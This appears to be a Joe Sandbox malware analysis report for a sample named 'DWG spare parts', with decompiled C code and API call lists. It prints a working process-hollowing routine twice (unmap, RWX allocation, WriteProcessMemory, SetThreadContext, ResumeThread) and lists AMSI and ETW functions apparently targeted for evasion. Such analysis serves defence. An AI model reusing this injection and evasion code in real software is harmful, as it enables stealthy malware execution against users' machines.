                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,Initialize,0252AD5C,OpenSession,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,OpenSession,0252AD5C,0252B044), ref: 0252A7B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                 • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressAttributesContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait
                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$NotifyChangeEventLog$NtCreateFile$NtOpenFile$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$iexpress$iexpress.exe$kernel32$ntdll$shell32
                                                                • API String ID: 377554698-2165151845
                                                                • Opcode ID: b70b0731c84ee50442873202744106f272a8ef95d54bd2425de2f9a269d975a7
                                                                • Instruction ID: 088cb5e224d036afbccc9c1b959a8b6cec9d6749aeb09b6ce6408e20adb8636d
                                                                • Opcode Fuzzy Hash: b70b0731c84ee50442873202744106f272a8ef95d54bd2425de2f9a269d975a7
                                                                • Instruction Fuzzy Hash: 34F2D075A0112A9BEB10FB54D880ADE73B7FFC5300F5199E69008A7290DE34AE89DF5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3863 2515d0c-2515d4d GetModuleFileNameA RegOpenKeyExA 3864 2515d8f-2515dd2 call 2515b48 RegQueryValueExA 3863->3864 3865 2515d4f-2515d6b RegOpenKeyExA 3863->3865 3872 2515dd4-2515df0 RegQueryValueExA 3864->3872 3873 2515df6-2515e10 RegCloseKey 3864->3873 3865->3864 3866 2515d6d-2515d89 RegOpenKeyExA 3865->3866 3866->3864 3868 2515e18-2515e49 lstrcpynA GetThreadLocale GetLocaleInfoA 3866->3868 3870 2515f32-2515f39 3868->3870 3871 2515e4f-2515e53 3868->3871 3874 2515e55-2515e59 3871->3874 3875 2515e5f-2515e75 lstrlenA 3871->3875 3872->3873 3876 2515df2 3872->3876 3874->3870 3874->3875 3878 2515e78-2515e7b 3875->3878 3876->3873 3879 2515e87-2515e8f 3878->3879 3880 2515e7d-2515e85 3878->3880 3879->3870 3882 2515e95-2515e9a 3879->3882 3880->3879 3881 2515e77 3880->3881 3881->3878 3883 2515ec4-2515ec6 3882->3883 3884 2515e9c-2515ec2 lstrcpynA LoadLibraryExA 3882->3884 3883->3870 3885 2515ec8-2515ecc 3883->3885 3884->3883 3885->3870 3886 2515ece-2515efe lstrcpynA LoadLibraryExA 3885->3886 3886->3870 3887 2515f00-2515f30 lstrcpynA LoadLibraryExA 3886->3887 3887->3870
                                                                C-Code - Quality: 86%
                                                                			E02515D0C(CHAR* __eax) {
                                                                				CHAR* _v8;
                                                                				void* _v12;
                                                                				char _v15;
                                                                				char _v17;
                                                                				char _v18;
                                                                				char _v22;
                                                                				int _v28;
                                                                				char _v289;
                                                                				long _t44;
                                                                				long _t61;
                                                                				long _t63;
                                                                				CHAR* _t74;
                                                                				CHAR* _t99;
                                                                				CHAR* _t100;
                                                                				intOrPtr _t104;
                                                                				struct HINSTANCE__* _t112;
                                                                				void* _t115;
                                                                				void* _t117;
                                                                				intOrPtr _t118;
                                                                
                                                                				_t115 = _t117;
                                                                				_t118 = _t117 + 0xfffffee0;
                                                                				_v8 = __eax;
                                                                				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                				_v22 = 0;
                                                                				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                				if(_t44 == 0) {
                                                                					L3:
                                                                					_push(_t115);
                                                                					_push(0x2515e11);
                                                                					_push( *[fs:eax]);
                                                                					 *[fs:eax] = _t118;
                                                                					_v28 = 5;
                                                                					E02515B48( &_v289, 0x105);
                                                                					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E02515F78, 0, 0,  &_v22,  &_v28) != 0) {
                                                                						_v22 = 0;
                                                                					}
                                                                					_v18 = 0;
                                                                					_pop(_t104);
                                                                					 *[fs:eax] = _t104;
                                                                					_push(E02515E18);
                                                                					return RegCloseKey(_v12);
                                                                				} else {
                                                                					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                					if(_t61 == 0) {
                                                                						goto L3;
                                                                					} else {
                                                                						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                						if(_t63 != 0) {
                                                                							lstrcpynA( &_v289, _v8, 0x105);
                                                                							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
                                                                							_t112 = 0;
                                                                							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
                                                                								while( *_t99 != 0x2e && _t99 !=  &_v289) {
                                                                									_t99 = _t99 - 1;
                                                                								}
                                                                								_t74 =  &_v289;
                                                                								if(_t99 != _t74) {
                                                                									_t100 =  &(_t99[1]);
                                                                									if(_v22 != 0) {
                                                                										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
                                                                										_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                									}
                                                                									if(_t112 == 0 && _v17 != 0) {
                                                                										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                                                                										_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                										if(_t112 == 0) {
                                                                											_v15 = 0;
                                                                											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
                                                                											_t112 = LoadLibraryExA( &_v289, 0, 2);
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                							return _t112;
                                                                						} else {
                                                                							goto L3;
                                                                						}
                                                                					}
                                                                				}
                                                                			}

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02510000,0252D7B4), ref: 02515D28
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D46
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D64
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02515D82
                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02515DCB
                                                                • RegQueryValueExA.ADVAPI32(?,02515F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001), ref: 02515DE9
                                                                • RegCloseKey.ADVAPI32(?,02515E18,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02515E0B
                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02515E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02515E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02515E3B
                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02515E66
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EAD
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EBD
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EE5
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EF5
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02515F1B
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02515F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                • API String ID: 1759228003-2375825460
                                                                • Opcode ID: e4aba3bb1d798387e95711624bdd10384d79968a9da619d29ac83676ace3d193
                                                                • Instruction ID: bbca589ab1ecfe6cdc41080b0d5028346d19343eee778c87e9594d0691ecda66
                                                                • Opcode Fuzzy Hash: e4aba3bb1d798387e95711624bdd10384d79968a9da619d29ac83676ace3d193
                                                                • Instruction Fuzzy Hash: D2519571E4020D7AFB25D6A4CC85FEF7BADAB84740F8041E1AB04E6181E7B4DA44CF68
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 83%
                                                                			E025248A4(char __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
                                                                				char _v8;
                                                                				short* _t23;
                                                                				intOrPtr _t28;
                                                                				intOrPtr* _t31;
                                                                				int _t38;
                                                                				void* _t39;
                                                                				int _t40;
                                                                				intOrPtr _t41;
                                                                				void* _t43;
                                                                				intOrPtr _t45;
                                                                				intOrPtr _t47;
                                                                				intOrPtr _t49;
                                                                				void* _t51;
                                                                				void* _t55;
                                                                				intOrPtr _t56;
                                                                				void* _t58;
                                                                				void* _t59;
                                                                				intOrPtr _t61;
                                                                				void* _t64;
                                                                				void* _t66;
                                                                				intOrPtr _t72;
                                                                				intOrPtr _t74;
                                                                				intOrPtr _t76;
                                                                				intOrPtr _t80;
                                                                				void* _t82;
                                                                				long _t83;
                                                                				intOrPtr _t84;
                                                                				void* _t86;
                                                                				intOrPtr _t88;
                                                                				intOrPtr _t90;
                                                                				void* _t92;
                                                                				void* _t93;
                                                                				intOrPtr _t95;
                                                                				void* _t96;
                                                                				intOrPtr _t104;
                                                                				intOrPtr _t108;
                                                                				void* _t111;
                                                                				intOrPtr _t113;
                                                                				intOrPtr* _t119;
                                                                				intOrPtr* _t120;
                                                                				void* _t126;
                                                                				void* _t133;
                                                                
                                                                				_t133 = __fp0;
                                                                				_t95 = __edx;
                                                                				_v8 = __eax;
                                                                				E02514D54(_v8);
                                                                				_push(_t119);
                                                                				_push(0x2524b2f);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t119;
                                                                				 *0x256d46c = _t95;
                                                                				_t23 =  *0x256d46c; // 0x7ef90018
                                                                				if( *_t23 == 0x5a4d) {
                                                                					_push(0);
                                                                					_push(_t95);
                                                                					_t28 =  *0x256d46c; // 0x7ef90018
                                                                					_t3 = _t28 + 0x3c; // 0x110
                                                                					asm("cdq");
                                                                					asm("adc edx, [esp+0x4]");
                                                                					_t120 = _t119 + 8;
                                                                					 *0x256d470 =  *_t3 +  *_t119;
                                                                					_t31 =  *0x256d470; // 0x7ef90128
                                                                					if( *_t31 == 0x4550) {
                                                                						E02513518(0x256d35c, 0x44);
                                                                						E02513518(0x256d34c, 0x10);
                                                                						0x256d35c->cb = 0x44;
                                                                						_t38 = CreateProcessA(E02514D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x256d35c, 0x256d34c); // executed
                                                                						if(_t38 != 0) {
                                                                							0x256d3a0->ContextFlags = 0x10007;
                                                                							_t39 =  *0x256d350; // 0x5b4
                                                                							_t40 = GetThreadContext(_t39, 0x256d3a0); // executed
                                                                							if(_t40 != 0) {
                                                                								_t41 =  *0x256d444; // 0x3a2000
                                                                								_t43 = 0x256d34c->hProcess; // 0x5c8
                                                                								ReadProcessMemory(_t43, _t41 + 8, 0x256d474, 4, 0x256d47c);
                                                                								_t45 =  *0x256d470; // 0x7ef90128
                                                                								_t5 = _t45 + 0x34; // 0x400000
                                                                								_t126 =  *_t5 -  *0x256d474; // 0x400000
                                                                								if(_t126 != 0) {
                                                                									_t47 =  *0x256d470; // 0x7ef90128
                                                                									_t10 = _t47 + 0x50; // 0x7f000
                                                                									_t49 =  *0x256d470; // 0x7ef90128
                                                                									_t11 = _t49 + 0x34; // 0x400000
                                                                									_t51 = 0x256d34c->hProcess; // 0x5c8
                                                                									 *0x256d478 = VirtualAllocEx(_t51,  *_t11,  *_t10, 0x3000, 0x40);
                                                                								} else {
                                                                									_t80 =  *0x256d470; // 0x7ef90128
                                                                									_t6 = _t80 + 0x34; // 0x400000
                                                                									_t82 = 0x256d34c->hProcess; // 0x5c8
                                                                									_t83 = NtUnmapViewOfSection(_t82,  *_t6); // executed
                                                                									if(_t83 != 0) {
                                                                										_t84 =  *0x256d470; // 0x7ef90128
                                                                										_t9 = _t84 + 0x50; // 0x7f000
                                                                										_t86 = 0x256d34c->hProcess; // 0x5c8
                                                                										 *0x256d478 = VirtualAllocEx(_t86, 0,  *_t9, 0x3000, 0x40);
                                                                									} else {
                                                                										_t88 =  *0x256d470; // 0x7ef90128
                                                                										_t7 = _t88 + 0x50; // 0x7f000
                                                                										_t90 =  *0x256d470; // 0x7ef90128
                                                                										_t8 = _t90 + 0x34; // 0x400000
                                                                										_t92 = 0x256d34c->hProcess; // 0x5c8
                                                                										_t93 = VirtualAllocEx(_t92,  *_t8,  *_t7, 0x3000, 0x40); // executed
                                                                										 *0x256d478 = _t93;
                                                                									}
                                                                								}
                                                                								if( *0x256d478 != 0) {
                                                                									_t96 = E025247B4(_t95, _t133);
                                                                									_t108 =  *0x256d470; // 0x7ef90128
                                                                									_t12 = _t108 + 0x34; // 0x400000
                                                                									_t109 =  *_t12;
                                                                									_t55 =  *0x256d478; // 0x400000
                                                                									if( *_t12 != _t55) {
                                                                										_t72 =  *0x256d470; // 0x7ef90128
                                                                										E025246AC(_t133, _t96, _t72, _t55 - _t109);
                                                                										_t74 =  *0x256d470; // 0x7ef90128
                                                                										_t111 =  *0x256d478; // 0x400000
                                                                										 *(_t74 + 0x34) = _t111;
                                                                										_push(0);
                                                                										_push(_t96);
                                                                										_t76 =  *0x256d46c; // 0x7ef90018
                                                                										_t14 = _t76 + 0x3c; // 0x110
                                                                										asm("cdq");
                                                                										asm("adc edx, [esp+0x4]");
                                                                										_t113 =  *0x256d470; // 0x7ef90128
                                                                										E02516A58( *_t14 +  *_t120, _t113);
                                                                									}
                                                                									_t56 =  *0x256d470; // 0x7ef90128
                                                                									_t15 = _t56 + 0x50; // 0x7f000
                                                                									_t58 =  *0x256d478; // 0x400000
                                                                									_t59 = 0x256d34c->hProcess; // 0x5c8
                                                                									WriteProcessMemory(_t59, _t58, _t96,  *_t15, 0x256d47c);
                                                                									_t61 =  *0x256d470; // 0x7ef90128
                                                                									_t16 = _t61 + 0x28; // 0x327a4
                                                                									 *0x256d450 =  *_t16 +  *0x256d478;
                                                                									_t64 =  *0x256d350; // 0x5b4
                                                                									SetThreadContext(_t64, 0x256d3a0);
                                                                									_t66 =  *0x256d350; // 0x5b4
                                                                									ResumeThread(_t66);
                                                                									E02512C5C(_t96);
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				_pop(_t104);
                                                                				 *[fs:eax] = _t104;
                                                                				_push(E02524B36);
                                                                				return E025148A0( &_v8);
                                                                			}

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                • GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                • ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                • NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
                                                                • VirtualAllocEx.KERNEL32(000005C8,00000000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 02524A13
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000), ref: 02524A3E
                                                                • WriteProcessMemory.KERNEL32(000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4), ref: 02524AD1
                                                                • SetThreadContext.KERNEL32(000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004), ref: 02524AF4
                                                                • ResumeThread.KERNEL32(000005B4,000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474), ref: 02524AFF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocProcessThreadVirtual$ContextMemory$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 995461784-0
                                                                • Opcode ID: 108f74eac4ae7baf131746c3d0d1a13384cfe510d8e2b80e88a24e5bfbf88c1e
                                                                • Instruction ID: 72ded70c9ca07bd09d8165c6d87996a53af7608cc590e82e82926b959edfdce3
                                                                • Opcode Fuzzy Hash: 108f74eac4ae7baf131746c3d0d1a13384cfe510d8e2b80e88a24e5bfbf88c1e
                                                                • Instruction Fuzzy Hash: 686104B0B92200AFE748DE6DD889F2A37B9B789705F054D14F644DB680C7B5EC289B1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 83%
                                                                			E025248A2(char __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
                                                                				char _v8;
                                                                				short* _t23;
                                                                				intOrPtr _t28;
                                                                				intOrPtr* _t31;
                                                                				int _t38;
                                                                				void* _t39;
                                                                				int _t40;
                                                                				intOrPtr _t41;
                                                                				void* _t43;
                                                                				intOrPtr _t45;
                                                                				intOrPtr _t47;
                                                                				intOrPtr _t49;
                                                                				void* _t51;
                                                                				void* _t55;
                                                                				intOrPtr _t56;
                                                                				void* _t58;
                                                                				void* _t59;
                                                                				intOrPtr _t61;
                                                                				void* _t64;
                                                                				void* _t66;
                                                                				intOrPtr _t72;
                                                                				intOrPtr _t74;
                                                                				intOrPtr _t76;
                                                                				intOrPtr _t80;
                                                                				void* _t82;
                                                                				long _t83;
                                                                				intOrPtr _t84;
                                                                				void* _t86;
                                                                				intOrPtr _t88;
                                                                				intOrPtr _t90;
                                                                				void* _t92;
                                                                				void* _t93;
                                                                				intOrPtr _t95;
                                                                				void* _t96;
                                                                				intOrPtr _t104;
                                                                				intOrPtr _t108;
                                                                				void* _t111;
                                                                				intOrPtr _t113;
                                                                				intOrPtr* _t119;
                                                                				intOrPtr* _t120;
                                                                				void* _t126;
                                                                				void* _t133;
                                                                
                                                                				_t133 = __fp0;
                                                                				_t95 = __edx;
                                                                				_v8 = __eax;
                                                                				E02514D54(_v8);
                                                                				_push(_t119);
                                                                				_push(0x2524b2f);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t119;
                                                                				 *0x256d46c = _t95;
                                                                				_t23 =  *0x256d46c; // 0x7ef90018
                                                                				if( *_t23 == 0x5a4d) {
                                                                					_push(0);
                                                                					_push(_t95);
                                                                					_t28 =  *0x256d46c; // 0x7ef90018
                                                                					_t3 = _t28 + 0x3c; // 0x110
                                                                					asm("cdq");
                                                                					asm("adc edx, [esp+0x4]");
                                                                					_t120 = _t119 + 8;
                                                                					 *0x256d470 =  *_t3 +  *_t119;
                                                                					_t31 =  *0x256d470; // 0x7ef90128
                                                                					if( *_t31 == 0x4550) {
                                                                						E02513518(0x256d35c, 0x44);
                                                                						E02513518(0x256d34c, 0x10);
                                                                						0x256d35c->cb = 0x44;
                                                                						_t38 = CreateProcessA(E02514D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x256d35c, 0x256d34c); // executed
                                                                						if(_t38 != 0) {
                                                                							0x256d3a0->ContextFlags = 0x10007;
                                                                							_t39 =  *0x256d350; // 0x5b4
                                                                							_t40 = GetThreadContext(_t39, 0x256d3a0); // executed
                                                                							if(_t40 != 0) {
                                                                								_t41 =  *0x256d444; // 0x3a2000
                                                                								_t43 = 0x256d34c->hProcess; // 0x5c8
                                                                								ReadProcessMemory(_t43, _t41 + 8, 0x256d474, 4, 0x256d47c);
                                                                								_t45 =  *0x256d470; // 0x7ef90128
                                                                								_t5 = _t45 + 0x34; // 0x400000
                                                                								_t126 =  *_t5 -  *0x256d474; // 0x400000
                                                                								if(_t126 != 0) {
                                                                									_t47 =  *0x256d470; // 0x7ef90128
                                                                									_t10 = _t47 + 0x50; // 0x7f000
                                                                									_t49 =  *0x256d470; // 0x7ef90128
                                                                									_t11 = _t49 + 0x34; // 0x400000
                                                                									_t51 = 0x256d34c->hProcess; // 0x5c8
                                                                									 *0x256d478 = VirtualAllocEx(_t51,  *_t11,  *_t10, 0x3000, 0x40);
                                                                								} else {
                                                                									_t80 =  *0x256d470; // 0x7ef90128
                                                                									_t6 = _t80 + 0x34; // 0x400000
                                                                									_t82 = 0x256d34c->hProcess; // 0x5c8
                                                                									_t83 = NtUnmapViewOfSection(_t82,  *_t6); // executed
                                                                									if(_t83 != 0) {
                                                                										_t84 =  *0x256d470; // 0x7ef90128
                                                                										_t9 = _t84 + 0x50; // 0x7f000
                                                                										_t86 = 0x256d34c->hProcess; // 0x5c8
                                                                										 *0x256d478 = VirtualAllocEx(_t86, 0,  *_t9, 0x3000, 0x40);
                                                                									} else {
                                                                										_t88 =  *0x256d470; // 0x7ef90128
                                                                										_t7 = _t88 + 0x50; // 0x7f000
                                                                										_t90 =  *0x256d470; // 0x7ef90128
                                                                										_t8 = _t90 + 0x34; // 0x400000
                                                                										_t92 = 0x256d34c->hProcess; // 0x5c8
                                                                										_t93 = VirtualAllocEx(_t92,  *_t8,  *_t7, 0x3000, 0x40); // executed
                                                                										 *0x256d478 = _t93;
                                                                									}
                                                                								}
                                                                								if( *0x256d478 != 0) {
                                                                									_t96 = E025247B4(_t95, _t133);
                                                                									_t108 =  *0x256d470; // 0x7ef90128
                                                                									_t12 = _t108 + 0x34; // 0x400000
                                                                									_t109 =  *_t12;
                                                                									_t55 =  *0x256d478; // 0x400000
                                                                									if( *_t12 != _t55) {
                                                                										_t72 =  *0x256d470; // 0x7ef90128
                                                                										E025246AC(_t133, _t96, _t72, _t55 - _t109);
                                                                										_t74 =  *0x256d470; // 0x7ef90128
                                                                										_t111 =  *0x256d478; // 0x400000
                                                                										 *(_t74 + 0x34) = _t111;
                                                                										_push(0);
                                                                										_push(_t96);
                                                                										_t76 =  *0x256d46c; // 0x7ef90018
                                                                										_t14 = _t76 + 0x3c; // 0x110
                                                                										asm("cdq");
                                                                										asm("adc edx, [esp+0x4]");
                                                                										_t113 =  *0x256d470; // 0x7ef90128
                                                                										E02516A58( *_t14 +  *_t120, _t113);
                                                                									}
                                                                									_t56 =  *0x256d470; // 0x7ef90128
                                                                									_t15 = _t56 + 0x50; // 0x7f000
                                                                									_t58 =  *0x256d478; // 0x400000
                                                                									_t59 = 0x256d34c->hProcess; // 0x5c8
                                                                									WriteProcessMemory(_t59, _t58, _t96,  *_t15, 0x256d47c);
                                                                									_t61 =  *0x256d470; // 0x7ef90128
                                                                									_t16 = _t61 + 0x28; // 0x327a4
                                                                									 *0x256d450 =  *_t16 +  *0x256d478;
                                                                									_t64 =  *0x256d350; // 0x5b4
                                                                									SetThreadContext(_t64, 0x256d3a0);
                                                                									_t66 =  *0x256d350; // 0x5b4
                                                                									ResumeThread(_t66);
                                                                									E02512C5C(_t96);
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				_pop(_t104);
                                                                				 *[fs:eax] = _t104;
                                                                				_push(E02524B36);
                                                                				return E025148A0( &_v8);
                                                                			}

                                                                0x02524b21
                                                                0x02524b2e

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                • GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                • ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                • NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
                                                                • VirtualAllocEx.KERNEL32(000005C8,00000000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 02524A13
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000), ref: 02524A3E
                                                                • WriteProcessMemory.KERNEL32(000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4), ref: 02524AD1
                                                                • SetThreadContext.KERNEL32(000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004), ref: 02524AF4
